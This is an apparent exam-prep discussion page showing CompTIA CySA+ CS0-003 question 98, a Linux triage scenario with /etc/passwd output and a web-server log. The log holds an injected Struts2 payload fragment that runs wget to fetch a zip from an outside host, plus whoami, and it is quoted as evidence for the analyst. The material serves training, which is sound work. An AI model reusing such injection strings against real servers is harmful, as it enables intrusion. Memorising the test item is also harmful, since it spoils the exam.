1. Home
  2. Discussions
  3. CompTIA
  4. CompTIA CySA+
  5. CS0-003 Discussions
  6. CS0-003 Exam Topic 10 Question 98 Discussion

CompTIA CyberSecurity Analyst CySA+ Certification Exam CS0-003 Question # 98 Topic 10 Discussion

 CompTIA Discussions      Browse All Questions      Go to Exam Detail      Get Premium Access
 Previous
Next  

CompTIA CyberSecurity Analyst CySA+ Certification Exam CS0-003 Question # 98 Topic 10 Discussion

CS0-003 Exam Topic 10 Question 98 Discussion:
Question #: 98
Topic #: 10

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?
A.

Create a backdoor root account named zsh.

B.

Execute commands through an unsecured service account.

C.

Send a beacon to a command-and-control server.

D.

Perform a denial-of-service attack on the web server.

Get Premium CS0-003 Questions
Actual exam question for CompTIA CS0-003 exam by Zane55536 at Aug 3, 2025, 12:00:00 AM

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.

Submit
 Previous
Next